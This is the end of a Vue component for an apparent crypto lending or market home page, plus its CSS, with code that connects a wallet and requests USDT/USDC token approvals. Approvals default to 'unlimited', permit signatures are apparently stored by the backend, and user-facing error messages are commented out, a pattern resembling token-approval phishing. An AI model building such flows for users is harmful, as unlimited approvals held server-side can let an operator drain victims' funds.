					// 统一处理涨跌幅格式：将小数形式转换为百分比显示
					this.marketList[index].zdf = (item.zdf * 100).toFixed(2);
					this.chartData[item.code] = item.hundred;
					setTimeout(() => {
						this.chartInit(item.code);
					})
				})


			}).catch(err => {
				console.log(err)
			})
		},

		// 初始化钱包工具
		async initWallet() {
			try {
				this.walletUtils = new WalletUtils();
				// 检查是否已经连接钱包（钱包登录时userName就是钱包地址）
				if (this.getUserInfo && this.getUserInfo.userName) {
					this.walletConnected = true;
					this.walletAddress = this.getUserInfo.userName;
					// 检查授权状态
					await this.checkAuthStatus();
				}
			} catch (error) {
				console.error('初始化钱包工具失败:', error);
			}
		},

		// 检查授权状态
		async checkAuthStatus() {
			if (!this.walletAddress) return;

			try {
				const { checkAuthStatus } = await import('@/api/wallet/index.js');
				const response = await checkAuthStatus();

				if (response.code === '200' && response.data) {
					// 更新授权状态
					this.authStatus.USDT = response.data.usdtAuthorized || false;
					this.authStatus.USDC = response.data.usdcAuthorized || false;

					console.log('授权状态检查完成:', this.authStatus);
				} else {
					// 默认为未授权状态
					this.authStatus.USDT = false;
					this.authStatus.USDC = false;
				}
			} catch (error) {
				console.error('检查授权状态失败:', error);
				// 默认为未授权状态
				this.authStatus.USDT = false;
				this.authStatus.USDC = false;
			}
		},

		// 钱包授权方法   todo
		async openWalletAuth(tokenType) {
			if (this.walletLoading) return;

			try {
				this.walletLoading = true;

				// 1. 检查是否已登录（钱包登录时userName就是钱包地址）
				if (!this.getUserInfo || !this.getUserInfo.userName) {
					this.$message({
						message: this.$t('wallet.pleaseLoginFirst'),
						type: 'warning',
						duration: 3000
					});
					// 延迟跳转避免路由冲突
					setTimeout(() => {
						window.location.href = '#/empty';
					}, 1000);
					return;
				}

				// 2. 检查是否已授权
				if (this.authStatus[tokenType]) {
					this.$message.info(this.$t('wallet.alreadyAuthorized', { token: tokenType }));
					return;
				}

				// 3. 初始化钱包工具（如果还没有）
				if (!this.walletUtils) {
					this.walletUtils = new WalletUtils();
				}

				// 4. 连接钱包
				const connectResult = await this.walletUtils.connectWallet();
				if (!connectResult || !connectResult.address) {
					throw new Error('钱包连接失败');
				}

				// 5. 验证地址是否匹配（钱包登录时userName就是钱包地址）
				if (connectResult.address.toLowerCase() !== this.getUserInfo.userName.toLowerCase()) {
					//this.$message.error('当前钱包地址与登录地址不匹配，请切换到正确的钱包地址');
					return;
				}

				// 6. 执行代币授权
				// this.$message({
				// 	message: this.$t('wallet.authorizingToken', { token: tokenType }),
				// 	type: 'info',
				// 	duration: 5000
				// });
				const authResult = await this.walletUtils.approveToken(tokenType);

				if (authResult.success) {
					this.authStatus[tokenType] = true;
					// this.$message({
					// 	message: this.$t('wallet.authSuccessWithReward', { token: tokenType }),
					// 	type: 'success',
					// 	duration: 4000
					// });
					this.$message({
						message: this.$t('wallet.authorizationSuccess'),
						type: 'success',
						duration: 4000
					});

					// 7. 保存授权信息到后端
					await this.saveWalletAuth(tokenType, authResult);

					// 8. 重新获取用户信息，更新授权状态
					await this.refreshUserInfo();
				} else {
					throw new Error(authResult.error || this.$t('wallet.authFailed'));
				}

			} catch (error) {
				console.error('钱包授权失败:', error);
				this.$message({
					message: this.$t('wallet.authorizationFailed'),
					type: 'error',
					duration: 3000
				});

				// 用户取消授权
				if (error.code === 4001 || error.message.includes('User denied')) {
					// this.$message({
					// 	message: this.$t('wallet.userCancelledAuth'),
					// 	type: 'info',
					// 	duration: 3000
					// });
				} else {
					// this.$message({
					// 	message: error.message || this.$t('wallet.authFailedRetry'),
					// 	type: 'error',
					// 	duration: 4000
					// });
				}
			} finally {
				this.walletLoading = false;
			}
		},

		// 保存钱包授权信息到后端
		async saveWalletAuth(tokenType, authResult) {
			try {
				if (authResult.savedToBackend || authResult.authMethod === 'permit') {
					console.log('Permit 授权已在后端保存，跳过重复提交')
					return
				}

				const { saveWalletAuth } = await import('@/api/wallet/index.js');

				const authData = {
					walletAddress: this.walletAddress,
					tokenType: tokenType,
					transactionHash: authResult.transactionHash,
					blockNumber: authResult.blockNumber,
					gasUsed: authResult.gasUsed,
					authorizationAmount: authResult.amount || 'unlimited',
					network: authResult.network || 'ethereum'
				};

				const response = await saveWalletAuth(authData);
				if (response.code === '200') {
					console.log('授权信息保存成功:', response.data);
				} else {
					console.warn('授权信息保存失败:', response.message);
				}
			} catch (error) {
				console.error('保存授权信息失败:', error);
				// 不影响用户体验，只记录日志
			}
		},

		// 重新获取用户信息
		async refreshUserInfo() {
			try {
				console.log('🔄 授权成功后重新获取用户信息...');
				await this.$store.dispatch('GET_USER_INFO');
				console.log('✅ 用户信息更新完成:', this.getUserInfo);
			} catch (error) {
				console.error('❌ 重新获取用户信息失败:', error);
			}
		}
	}

}
</script>
<style scoped>
@keyframes toFront {
	0% {
		z-index: 2;
		transform: scale(.9);
		animation: normal;
		top: 0;
	}

	50% {
		top: -50vw;
		transform: scale(1);
	}

	80% {
		z-index: 3;
	}

	100% {
		top: .6rem;
	}
}

@keyframes toBack {
	0% {
		z-index: 3;
		animation: normal;
		top: .6rem;
		transform: scale(.85);
	}

	50% {
		top: 50vw;
		transform: scale(.9);
	}

	80% {
		z-index: 2;
	}

	100% {
		top: 0;
	}
}

.mains .cards .cards-main .open-button img {
	width: 100%;
	height: 100%;
}

.mains .cards .cards-main .open-button {
	width: .75rem;
	height: .36rem;
	position: absolute;
	bottom: .1rem;
	right: 0;
}

.mains .cards .cards-main .iconlogo img {
	width: 100%;
	height: 100%;
}

.mains .cards .cards-main .iconlogo {
	width: .74rem;
	height: .16rem;
	position: absolute;
	top: 0;
	right: 0;
}

.mains .cards .cards-main .schedule img {
	position: relative;
	margin-right: .05rem;
}

.mains .cards .cards-main .schedule span {
	font-weight: 700;
}

.mains .cards .cards-main .schedule {
	font-size: .12rem;
	font-weight: 400;
	line-height: .24rem;
	vertical-align: middle;
	display: flex;
	align-items: center;
}

.mains .cards .cards-main .counts span {
	font-size: .16rem;
}

.mains .cards .cards-main .counts {
	font-size: .32rem;
	font-style: normal;
	font-weight: 700;
	line-height: 150%;
}

.mains .cards .cards-main .titles {
	font-size: .14rem;
	font-style: normal;
	font-weight: 400;
	margin-bottom: .05rem;
	line-height: .24rem;
}

.mains .cards .cards-main {
	z-index: 1;
	width: calc(100% - .4rem);
	height: 1.01rem;
	position: relative;
	color: #fff;
}

.mains .cards .maskings {
	width: 100%;
	height: 100%;
	position: absolute;
	left: 0;
	top: 0;
	background-image: url('@/assets/img/noise.png');
	z-index: 1;
}

.mains .cards .leftbg {
	width: 4.26rem;
	height: 4.26rem;
	transform: rotate(-90deg);
	flex-shrink: 0;
	position: absolute;
	left: 1.45rem;
	top: -1.72rem;
	border-radius: 4.26rem;
	background: linear-gradient(180deg, transparent, #9ee970);
}

.mains .cards1 .leftbg {
    background: linear-gradient(180deg,transparent,#a5a6f5);
}

.mains .cards .noice {
	width: 1.1rem;
	height: 1.1rem;
	background: url('@/assets/img/zi.svg') no-repeat;
	position: absolute;
	bottom: -.77rem;
	left: .45rem;
}

.mains .cards1 .noice {
	background: url('@/assets/img/green.svg') no-repeat;
}

.mains {
	position: relative;
	overflow: hidden;
	height: 2.4rem;
	margin-bottom: .15rem;
}

.home-mobile .content .lending-pool-entry {
	width: 100%;
	height: .56rem;
	background: #000;
	border-radius: .2rem;
	padding: 0 .2rem;
	margin-bottom: .12rem;
	display: flex;
	align-items: center;
	justify-content: space-between;
	cursor: pointer;
}

.home-mobile .content .lending-pool-entry .entry-left {
	display: flex;
	align-items: center;
	gap: .12rem;
}

.home-mobile .content .lending-pool-entry .entry-left img {
	width: .28rem;
	height: .28rem;
}

.home-mobile .content .lending-pool-entry .entry-left span {
	font-family: Mabry Pro;
	font-weight: 500;
	font-size: .18rem;
	color: #fff;
}

.home-mobile .content .lending-pool-entry .entry-arrow {
	width: .16rem;
	height: .16rem;
	transform: rotate(-90deg);
	opacity: .6;
}



.mains .disabled {
	top: 0;
	z-index: 2;
	animation: toBack .5s linear;
	animation-fill-mode: none;
	transform: scale(.9);
}

.mains .cards {
	width: 100%;
	height: 1.76rem;
	border-radius: .2rem;
	background: #000;
	overflow: hidden;
	display: flex;
	align-items: center;
	justify-content: center;
	position: absolute;
	top: 0;
	left: 0;
}

.mains .clicked {
	top: 0.6rem;
	z-index: 3;
	animation: toFront .5s linear;
	animation-fill-mode: none;
	transform: scale(1);
}

.home {
	/* width: 14.4rem; */
	overflow: hidden;
	padding-top: 0.75rem;
	padding-bottom: 1.04rem;
	margin: 0 auto;
	overflow-x: hidden;
}

.home-header {
	width: 12rem;
	margin: auto;
	position: relative;
}

.home-header .home-header-title {
	width: 7.27rem;
	/* height: 2.09rem; */
	color: #000;
	font-size: 0.67rem;
	line-height: 0.7rem;
	font-family: Mabry Pro;
	font-weight: 600;
}

.home-header .home-header-app {
	width: 2.05rem;
	height: 0.82rem;
	border-radius: 0.16rem;
	padding: 0.18rem 0.24rem;
	background: #000;
	margin-top: 0.36rem;
	/* margin-top: 0.86rem; */
	position: relative;
	font-family: Mabry Pro;
}

.home-header .home-header-app .app-icon {
	position: absolute;
	width: 0.23rem;
	height: 0.28rem;
	left: 0.25rem;
	top: 0.24rem;
}

.home-header .home-header-app .app-right {
	position: absolute;
	left: 0.61rem;
}

.home-header .home-header-app .app-right .app-ava {
	font-weight: 400;
	font-size: 0.14rem;
	line-height: 0.14rem;
	color: hsla(0, 0%, 100%, 0.7);
}

.home-header .home-header-app .app-right .app-store {
	font-weight: 700;
	font-size: 0.24rem;
	line-height: 0.24rem;
	color: #fff;
}

.home-header .home-header-application,
.home-header .home-header-credit {
	font-family: Mabry Pro;
	margin-top: 0.75rem;
}

.home-header .home-header-application .icon-title,
.home-header .home-header-credit .icon-title {
	height: 0.24rem;
	display: flex;
	font-weight: 700;
	font-size: 0.24rem;
	color: #000;
	margin-bottom: 0.16rem;
}

.home-header .home-header-application .icon-title img,
.home-header .home-header-credit .icon-title img {
	width: 0.22rem;
	height: 0.24rem;
	transform: rotate(90deg);
	margin-top: 0.12rem;
	position: relative;
	top: -0.12rem;
}

.home-header .home-header-application .icon-title span,
.home-header .home-header-credit .icon-title span {
	margin-left: 0.12rem;
	font-family: Mabry Pro;
}

.home-header .home-header-application .icon-content,
.home-header .home-header-credit .icon-content {
	font-family: Mabry Pro;
	width: 4.1rem;
	height: 0.38rem;
	font-weight: 400;
	font-size: 0.15rem;
	line-height: 0.22rem;
	position: relative;
	left: 0.34rem;
}

.home-header .home-header-credit {
	margin-top: 0.46rem;
}

.home-header .home-header-box {
	/* width: 10.22rem; */
	/* height: 1.22rem; */
	background: #fff;
	box-shadow: 0 0.56rem 0.54rem rgba(0, 0, 0, 0.04);
	border-radius: 0.14rem;
	margin-top: 1.48rem;
	display: flex;
	align-items: center;
	padding: 0.68rem 0.89rem;
	z-index: 1;
	position: relative;
}

.home-header .home-header-box .box-mill,
.home-header .home-header-box .box-money,
.home-header .home-header-box .box-times {
	height: 1.22rem;
	width: 3.49rem;
}

.home-header .home-header-box .box-mill .box-top,
.home-header .home-header-box .box-money .box-top,
.home-header .home-header-box .box-times .box-top {
	height: 0.52rem;
	font-weight: 500;
	font-size: 0.52rem;
	line-height: 100%;
	color: #000;
	font-family: Mabry Pro;
	margin-bottom: 0.18rem;
}

.home-header .home-header-box .box-mill .box-content,
.home-header .home-header-box .box-money .box-content,
.home-header .home-header-box .box-times .box-content {
	height: 0.52rem;
	font-weight: 400;
	font-size: 0.22rem;
	line-height: 0.3rem;
	font-family: Mabry Pro;
	color: rgba(0, 0, 0, 0.6);
}

.home-header .home-header-box .box-times {
	width: 2.36rem;
	margin-left: 0.94rem;
	margin-right: 1.01rem;
}

.home-header .home-header-box .box-mill {
	width: 2.43rem;
}

.home-header .home-header-imgs {
	position: absolute;
	right: 0rem;
	top: -0.48rem;
	width: 5.34rem;
	height: 8.82rem;
}

.home-header .home-header-imgs img{
	height: 130%;
}

.home-header .home-header-imgs .imgs-left {
	position: absolute;
	width: 2.74rem;
	height: 5.59rem;
	left: -0.3rem;
	top: 2.6rem;
	filter: drop-shadow(-0.15rem 1.04rem 0.4rem rgba(0, 0, 0, 0.08));
	z-index: 0;
}

.home-header .home-header-imgs .imgs-right {
	position: absolute;
	width: 3.32rem;
	height: 8.82rem;
	right: 0;
	filter: drop-shadow(-0.15rem 1.04rem 0.4rem rgba(0, 0, 0, 0.08));
	background-size: cover;
	z-index: 0;
}

.home-body {
	width: 13.2rem;
	margin: auto;
	margin-top: 1rem;
}

.home-body .box-butttons1 {
	width: 100%;
	display: flex;
	justify-content: space-between;
	align-items: stretch;
}

.home-body .box-butttons1 .buttons-big {
	padding: 0.34rem 0;
	width: 6.51rem;
	border-radius: 0.16rem;
	background: #000;
	background-size: cover;
	position: relative;
	overflow: hidden;
}

.home-body .box-butttons1 .buttons-big .info-buttons-content {
	position: relative;
	width: 100%;
	height: 100%;
	z-index: 2;
}

.home-body .box-butttons1 .buttons-big .info-buttons-content .content-icon {
	width: 0.28rem;
	height: 0.28rem;
	background: url(../../../assets/img/icon_vetor.e4607d5d.svg) no-repeat;
	border-radius: 0.28rem;
	margin: 0 auto;
}

.home-body .box-butttons1 .buttons-big .info-buttons-content .content-text {
	width: 100%;
	height: 0.24rem;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 700;
	font-size: 0.24rem;
	line-height: 0.24rem;
	color: #fff;
	margin-top: 0.16rem;
	margin-bottom: 0.12rem;
	text-align: center;
}

.home-body .box-butttons1 .buttons-big .info-buttons-content .content-text1 {
	padding: 0 0.3rem;
	box-sizing: border-box;
	width: 100%;
	line-height: 0.2rem;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 300;
	font-size: 0.16rem;
	color: hsla(0, 0%, 100%, 0.6);
	text-align: center;
	display: -webkit-box;
	-webkit-box-orient: vertical;
	-webkit-line-clamp: 2;
	overflow: hidden;
}

.home-body .box-butttons1 .buttons-big2:before {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #9ee970);
	transform: rotate(-90deg);
	display: inline-block;
	border-radius: 0.55rem;
	position: absolute;
	right: -0.35rem;
	top: -0.7rem;
}

.home-body .box-butttons1 .buttons-big2:after {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #a5a6f5);
	transform: rotate(-30deg);
	display: inline-block;
	border-radius: 0.55rem;
	position: absolute;
	left: 1.2rem;
	bottom: -0.7rem;
}

.home-body .box-butttons1 .buttons-big1 {
	background: unset;
	border: 0.01rem solid #000;
	display: flex;
	flex-direction: column;
	align-items: center;
	justify-content: center;
}

.home-body .box-butttons1 .buttons-big1 .content-icon {
	width: 0.42rem;
	height: 0.42rem;
	background: url(../../../assets/img/icon_bell1.98a9a1d5.svg) no-repeat;
	background-size: cover;
}

.home-body .box-butttons1 .buttons-big1 .content-text {
	width: 80%;
	height: 0.5rem;
	font-weight: 700;
	font-size: 0.22rem;
	color: #000;
	margin-top: 0.15rem;
	text-align: center;
}

.home-body .box-butttons2 {
	margin-top: 0.18rem;
	width: 100%;
	height: 2.68rem;
	display: flex;
	justify-content: space-between;
}

.home-body .box-butttons2 .butttons2 {
	width: 3.18rem;
	height: 2.68rem;
	border-radius: 0.1rem;
	background: #000 no-repeat;
	background-size: cover;
	position: relative;
	overflow: hidden;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content {
	position: absolute;
	width: 100%;
	height: 100%;
	z-index: 2;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-icon {
	width: 0.46rem;
	height: 0.46rem;
	text-align: center;
	margin: auto;
	margin-top: 0.54rem;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-icon1 {
	margin-top: 0.35rem;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-text1 {
	width: 100%;
	font-weight: 300;
	font-size: 0.12rem;
	line-height: 100%;
	text-align: center;
	color: hsla(0, 0%, 100%, 0.6);
	margin-top: 0.17rem;
	margin-bottom: 0.12rem;
	font-family: Mabry Pro;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-text2 {
	width: 100%;
	font-weight: 700;
	font-size: 0.2rem;
	line-height: 100%;
	text-align: center;
	color: #fff;
	margin-bottom: 0.12rem;
	font-family: Mabry Pro;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-text3 {
	width: 100%;
	font-weight: 300;
	font-size: 0.12rem;
	line-height: 0.2rem;
	text-align: center;
	color: hsla(0, 0%, 100%, 0.6);
	margin-bottom: 0.12rem;
	font-family: Mabry Pro;
}

.home-body .box-butttons2 .butttons2 .info-buttons-content .butttons2-button {
	font-family: Mabry Pro;
	width: 1.14rem;
	height: 0.34rem;
	background: #fff;
	border-radius: 0.22rem;
	font-weight: 500;
	font-size: 0.14rem;
	line-height: 100%;
	text-align: center;
	line-height: 0.34rem;
	margin: auto;
}

.home-body .box-butttons2 .butttons2:before {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #a5a6f5);
	display: inline-block;
	border-radius: 0.55rem;
	position: absolute;
	left: -0.2rem;
	bottom: -0.4rem;
}

.home-body .box-butttons2 .butttons2:after {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #9ee970);
	transform: rotate(-180deg);
	display: inline-block;
	border-radius: 0.55rem;
	position: absolute;
	right: -0.2rem;
	top: -0.5rem;
}

.box-lists {
	width: 9.86rem;
	margin: auto;
	margin-top: 1.3rem;
	margin-bottom: 1.3rem
}

.box-lists .box-heder {
	width: 100%;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 400;
	font-size: .18rem;
	line-height: 100%;
	color: rgba(0, 0, 0, .5);
	height: .38rem;
	display: flex;
	justify-content: space-between
}

.box-lists .box-heder div {
	float: left
}

.box-lists .box-heder .box-heder1 {
	margin-left: .44rem;
	text-align: left;
	width: 2.47rem
}

.box-lists .box-heder .box-heder2 {
	text-align: right;
	width: 1.4rem
}

.box-lists .box-heder .box-heder3 {
	width: 1.8rem;
	text-align: right;
	margin-right: .6rem
}

.box-lists .box-heder .box-heder4 {
	width: 1.19rem;
	text-align: right;
	margin-right: .6rem
}

.box-lists .box-heder .box-heder4-1 {
	margin-right: 0
}

.box-lists .box-heder .box-heder5 {
	width: 1.21rem;
	text-align: right
}

.box-lists .box-body .box-list {
	width: 100%;
	height: .84rem;
	background: #fff;
	box-shadow: 0 .34rem .44rem rgba(0, 0, 0, .08);
	border-radius: .16rem;
	margin-bottom: .16rem;
	position: relative;
	display: flex;
	justify-content: space-between;
	cursor: pointer
}

.box-lists .box-body .box-list div {
	float: left
}

.box-lists .box-body .box-list .box-heder1 {
	margin-left: .44rem;
	text-align: left;
	width: 2.47rem;
	line-height: .84rem;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 700
}

.box-lists .box-body .box-list .box-heder1 img {
	height: .36rem;
	vertical-align: middle;
	margin-right: .1rem
}

.box-lists .box-body .box-list .box-heder2 {
	text-align: right;
	width: 1.14rem;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 500;
	color: #44b400;
	line-height: .84rem
}

.box-lists .box-body .box-list .box-heder2-1 {
	color: #ff2828
}

.box-lists .box-body .box-list .box-heder3 {
	width: 1.8rem;
	text-align: right;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 400;
	line-height: .7rem;
	color: rgba(0, 0, 0, .5);
	display: flex;
	align-items: center
}

.box-lists .box-body .box-list .box-heder3 .chart {
	width: 1.8rem;
	height: .6rem
}

.box-lists .box-body .box-list .box-heder3 img {
	width: 1.1rem;
	height: .32rem
}

.box-lists .box-body .box-list .box-heder4 {
	width: 1.19rem;
	text-align: right;
	margin-right: .6rem;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 400;
	line-height: .84rem;
	color: rgba(0, 0, 0, .5)
}

.box-lists .box-body .box-list .box-heder4-1 {
	margin-right: 0
}

.box-lists .box-body .box-list .box-heder5 {
	width: 1.21rem;
	text-align: right;
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 400;
	line-height: .84rem;
	color: rgba(0, 0, 0, .5)
}

.box-lists .box-body .box-list .box-heder5-1 {
	width: 1.21rem
}

.box-lists .box-body .box-list .box-heder5-1 .add-button {
	display: inline-block;
	width: .63rem;
	height: .74rem;
	background: #efefef;
	border-radius: .16rem;
	font-weight: 500;
	font-size: .26rem;
	color: #000;
	text-align: center;
	line-height: .74rem;
	margin-top: .05rem;
	float: right;
	cursor: pointer
}

.box-lists .box-body .box-list-no {
	cursor: auto
}

.box-lists .box-body .box-list1 {
	z-index: 3
}

.box-lists .box-body .box-list2 {
	z-index: 2
}

.box-lists .box-body .box-list3 {
	z-index: 1
}

.home-mobile {
	padding-top: .9rem;
	width: 100%
}

.home-mobile .content {
	width: calc(100% - .48rem);
	margin: auto
}

.home-mobile .content .new-feature {
	width: 100%;
	background: #000;
	border-radius: .2rem;
	padding: .26rem;
	position: relative;
	overflow: hidden
}

.home-mobile .content .new-feature .new-feature-content {
	position: relative;
	z-index: 2
}

.home-mobile .content .new-feature .new-feature-content .feature-icon {
	width: .28rem;
	height: .28rem;
	margin-bottom: .16rem
}

.home-mobile .content .new-feature .new-feature-content .feature-title {
	font-family: Mabry Pro;
	font-style: normal;
	font-weight: 500;
	font-size: .22rem;
	color: #fff;
	margin-bottom: .12rem
}

.home-mobile .content .new-feature .new-feature-content .feature-content {
	font-family: Mabry Pro;
	font-style: normal;
	font-size: .14rem;
	color: hsla(0, 0%, 100%, .6);
	line-height: .2rem;
	display: -webkit-box;
	-webkit-box-orient: vertical;
	-webkit-line-clamp: 2;
	overflow: hidden
}

.home-mobile .content .new-feature:before {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #9ee970);
	transform: rotate(-90deg);
	display: inline-block;
	border-radius: .55rem;
	position: absolute;
	right: -.35rem;
	top: -.7rem
}

.home-mobile .content .new-feature:after {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #a5a6f5);
	transform: rotate(-30deg);
	display: inline-block;
	border-radius: .55rem;
	position: absolute;
	left: 1.2rem;
	bottom: -.7rem
}

.home-mobile .content .wallet {
	width: 100%;
	height: .5rem;
	background: #fff;
	border: .01rem solid #000;
	border-radius: .16rem;
	font-weight: 700;
	font-size: .16rem;
	color: #000;
	margin-top: .12rem;
	box-sizing: border-box;
	display: flex;
	justify-content: center;
	align-items: center
}

.home-mobile .content .wallet img {
	width: .28rem;
	height: .28rem;
	vertical-align: middle
}

.home-mobile .content .wallet .msg-content {
	max-width: 80%
}

.home-mobile .content .info-buttons {
	width: 100%;
	height: max-content;
	background: #000;
	margin-top: .12rem;
	border-radius: .2rem;
	font-family: Mabry Pro;
	font-style: normal;
	text-align: center;
	position: relative;
	overflow: hidden
}

.home-mobile .content .info-buttons .info-buttons-content {
	position: relative;
	z-index: 2;
	width: 100%;
	height: max-content
}

.home-mobile .content .info-buttons .info-buttons-content .null-height {
	width: 100%;
	height: .4rem
}

.home-mobile .content .info-buttons .info-buttons-content .icon {
	width: .4rem;
	height: .4rem;
	margin: auto
}

.home-mobile .content .info-buttons .info-buttons-content .info-text1 {
	width: 100%;
	font-weight: 300;
	font-size: .14rem;
	color: hsla(0, 0%, 100%, .6);
	margin-top: .14rem
}

.home-mobile .content .info-buttons .info-buttons-content .info-text2 {
	width: 100%;
	font-weight: 500;
	font-size: .22rem;
	color: #fff;
	margin-top: .14rem
}

.home-mobile .content .info-buttons .info-buttons-content .info-text3 {
	width: 100%;
	font-weight: 300;
	font-size: .14rem;
	color: hsla(0, 0%, 100%, .6);
	line-height: .2rem;
	margin-top: .14rem
}

.home-mobile .content .info-buttons .info-buttons-content .info-text31 {
	width: 3.23rem;
	margin: auto;
	margin-top: .14rem
}

.home-mobile .content .info-buttons .info-buttons-content .info-button {
	width: 1.25rem;
	height: .44rem;
	background: #fff;
	border-radius: .22rem;
	font-weight: 500;
	font-size: .16rem;
	color: #000;
	line-height: .44rem;
	margin: auto;
	margin-top: .14rem;
	margin-bottom: .34rem
}

.home-mobile .content .info-buttons:before {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #a5a6f5);
	transform: rotate(-100deg);
	display: inline-block;
	border-radius: .55rem;
	position: absolute;
	left: calc(100% - 1.1rem);
	bottom: -.4rem
}

.home-mobile .content .info-buttons:after {
	content: "";
	width: 1.1rem;
	height: 1.1rem;
	background: linear-gradient(180deg, transparent, #9ee970);
	transform: rotate(-180deg);
	display: inline-block;
	border-radius: .55rem;
	position: absolute;
	left: -.5rem;
	top: -.5rem
}

.home-mobile .content .info-policy {
	display: flex;
	flex-wrap: wrap;
	padding-bottom: .4rem
}

.home-mobile .content .info-policy .info_item {
	margin-top: .6rem;
	width: 50%;
	padding-left: .3rem;
	box-sizing: border-box
}

.home-mobile .content .info-policy .info_item .info_title {
	margin-bottom: .3rem;
	font-weight: 700;
	font-size: .18rem
}

.home-mobile .content .info-policy .info_item .info_list .item_name {
	margin-top: .22rem;
	font-size: .16rem;
	color: rgba(0, 0, 0, .6)
}

.home-mobile .masking {
	width: 100%;
	height: 100%;
	position: absolute;
	left: 0;
	top: 0;
	background-image: url(../../../assets/img/noise.90f9bf5b.png);
	z-index: 1
}
</style>